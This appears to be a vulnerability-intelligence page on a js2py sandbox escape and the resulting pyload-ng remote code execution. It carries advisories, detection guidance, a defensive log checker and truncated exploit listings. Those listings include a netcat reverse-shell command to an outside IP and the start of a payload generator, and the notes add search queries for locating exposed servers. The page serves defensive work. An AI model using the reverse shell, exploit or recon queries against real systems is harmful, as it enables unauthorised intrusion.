CVE-2024-28397
Published: 2024-06-20
CVE-2024-28397: An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
Priority: P342 · medium · CVSS 3.1 score 5.3
CVSS vector: AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Exploit available
EPSS: 4.55% (90.4th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pyload-ng_project | pyload-ng | 0 – 0.5.0b3.dev85 | — |
Detection & IOCs
sigma
```yaml
id: CVE-2024-28397
info:
  name: pyload-ng js2py - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
http:
  - raw:
      - |-
        POST /flash/addcrypted2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        package=pkg&crypted=MTIzNA%3D%3D&jk=...
```
- Exploit targets the /flash/addcrypted2 POST endpoint; detect POST requests to this path from non-localhost sources, especially with a manipulated Host header.
- A successful exploit response contains the string 'Could not decrypt key' with HTTP 500; use this as a confirmation matcher alongside DNS/OOB callback detection.
- Shodan/FOFA/Google queries can identify exposed pyload instances: search for http.html:"pyload", body="pyload", intitle:"pyload", or app="pyLoad".
- The exploit uses `nc -e /bin/bash` for reverse shell delivery; monitor for subprocess spawning from the pyload process with netcat or /bin/bash as child processes.
- The /flash/addcrypted2 endpoint is intended to only accept localhost connections; the bypass relies entirely on Host header manipulation, so perimeter controls that trust the Host header will be ineffective.
- No patch exists for js2py as of the time of writing; version 0.74 (released Nov 6, 2022) is the latest and remains vulnerable.
- Calling js2py.disable_pyimport() does NOT fully sandbox the environment; attackers can still obtain a Python object reference and escape the sandbox via the class hierarchy traversal technique.
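As an added example that is not from this page or the pyload-ng project: a small Python checker that applies the detection guidance above to constructed access-log lines. The log format and its field names are assumptions; it flags POST requests to /flash/addcrypted2 from non-loopback clients, notes a Host header set to a loopback name (the spoofing the bypass relies on), and records an HTTP 500 response as the corroborating signal.

```python
import re
from dataclasses import dataclass
from ipaddress import ip_address
from typing import List, Optional, Tuple

# Constructed sample access-log lines (not taken from the page). Field layout
# is an assumption: client IP, method, path, Host header value, status code.
SAMPLE_LOG = """\
127.0.0.1 POST /flash/addcrypted2 host=127.0.0.1 status=200
203.0.113.7 POST /flash/addcrypted2 host=127.0.0.1 status=500
203.0.113.7 GET /flash/addcrypted2 host=pyload.example status=405
198.51.100.9 POST /flash/addcrypted2 host=localhost:8000 status=500
198.51.100.9 POST /api/login host=pyload.example status=200
"""

LINE_RE = re.compile(
    r"^(?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) host=(?P<host>\S+) status=(?P<status>\d{3})$"
)
TARGET_PATH = "/flash/addcrypted2"      # localhost-only endpoint abused by the exploit
LOOPBACK_NAMES = {"localhost", "127.0.0.1", "::1"}


@dataclass
class Alert:
    client_ip: str
    reasons: Tuple[str, ...]


def check_line(line: str) -> Optional[Alert]:
    """Return an Alert when a log line matches the exploit pattern, else None."""
    m = LINE_RE.match(line.strip())
    if not m or m["method"] != "POST" or m["path"] != TARGET_PATH:
        return None
    # Legitimate use of this endpoint comes from the loopback interface only.
    if ip_address(m["ip"]).is_loopback:
        return None
    reasons = ["non-loopback client reached a localhost-only endpoint"]
    # A remote client presenting a loopback Host header is the spoofing the bypass relies on.
    if m["host"].rsplit(":", 1)[0] in LOOPBACK_NAMES:
        reasons.append("Host header spoofed to a loopback name")
    # HTTP 500 is the corroborating signal the advisory notes for a successful exploit.
    if m["status"] == "500":
        reasons.append("HTTP 500 response, consistent with a successful exploit")
    return Alert(m["ip"], tuple(reasons))


def scan(log: str) -> List[Alert]:
    return [a for a in (check_line(ln) for ln in log.splitlines()) if a]
```

Bracketed IPv6 Host values are not special-cased; extend LOOPBACK_NAMES and the port stripping if your logs carry them.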
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 5.3 | MEDIUM | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L |
| ghsa | | 5.3 | MEDIUM | |
| osv | | 5.3 | MEDIUM | |
OSV · 2024-09-09 · CVSS 5.3
CVE-2024-39205 [MEDIUM] pyload-ng vulnerable to RCE with js2py sandbox escape
### Summary
Any pyload-ng running under Python 3.11 or below is vulnerable to RCE. An attacker can send a request containing any shell command and the victim server will execute it immediately.
### Details
js2py has a sandbox escape vulnerability assigned [CVE-2024-28397](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape), and js2py is used by the `/flash/addcrypted2` API endpoint of pyload-ng. Although this endpoint is designed to only accept localhost connections, we can bypass this restriction using an HTTP header, thus accessing this API and achieving RCE.
### PoC
The PoC is provided as `poc.py` below; you can modify the shell command it executes:
```python
import socket
import base64
from urllib.parse import quote
```
[PoC truncated in source]
GHSA · 2024-09-09 · CVSS 5.3
CVE-2024-39205 [MEDIUM] CWE-94 pyload-ng vulnerable to RCE with js2py sandbox escape (same advisory text as the OSV entry above)
GHSA · 2024-06-20
CVE-2024-28397 [HIGH] CWE-94 js2py allows remote code execution
An issue in the component `js2py.disable_pyimport()` of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
OSV · 2024-06-20
CVE-2024-28397 [HIGH] js2py allows remote code execution (same description as the GHSA entry)
OSV · 2024-06-20 · CVSS 5.3
CVE-2024-28397 [MEDIUM] CVE-2024-28397: An issue in the component js2py (same description as the GHSA entry)
No detection rules found.
Exploit-DB · 2026-04-30 · CVSS 5.3
CVE-2024-28397 [MEDIUM] Js2Py 0.74 - RCE
```python
"""
Exploit Title: Js2Py 0.74 - RCE
Date: 2026-02-03
Exploit Author: Ali Sünbül (xeloxa)
Author Page: https://github.com/xeloxa
Vendor Homepage: https://github.com/PiotrDabkowski/Js2Py
Software Link: https://pypi.org/project/Js2Py/
Version: payload.js
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
"""
import argparse
import sys


def generate_payload(command: str) -> str:
    """
    Generates the JavaScript payload to escape the sandbox and execute the command.

    Args:
        command (str): The system command to execute.

    Returns:
        str: The malicious JavaScript payload.
    """
    # Escape double quotes to prevent syntax errors in the JS string
    safe_command = command.replace('"', '\\"')
    # The payload uses a recursive search to find subprocess.Popen starting from a leaked
    # Python ob
```
[Exploit listing truncated in source]
Metasploit · CVSS 5.3
CVE-2024-39205 [MEDIUM] Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397)
CVE-2024-28397 is a sandbox escape in js2py (<=0.74), a popular Python package that evaluates JavaScript code inside a Python interpreter. The vulnerability allows an attacker to obtain a reference to a Python object in the js2py environment, enabling them to escape the sandbox, bypass pyimport restrictions and execute arbitrary commands on the host. At the time of writing no patch has been released; version 0.74, released Nov 6, 2022, is the latest version of js2py. CVE-2024-39205 is a remote code execution vulnerability in Pyload (<=0.5.0b3.dev85), an open-source download manager designed to automate file downloads from various online sources. Pyload is vulnerable because it exposes the v
Nuclei · CVSS 5.3
CVE-2024-28397 [MEDIUM] pyload-ng js2py - Remote Code Execution
An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
Template:
```yaml
id: CVE-2024-28397
info:
  name: pyload-ng js2py - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
  impact: |
    Attackers can execute arbitrary code on the server through malicious JavaScript code execution via js2py.
  remediation: |
    Update pyload-ng to a version that removes or secures the js2py dependency.
  reference:
    - https://github.com/advisories/GHSA-r9pp-r4xf-597r
    - https://github.com/Marven11/CVE-2024-28397-js2py-Sand
```
[Template truncated in source]
Published: 2024-06-20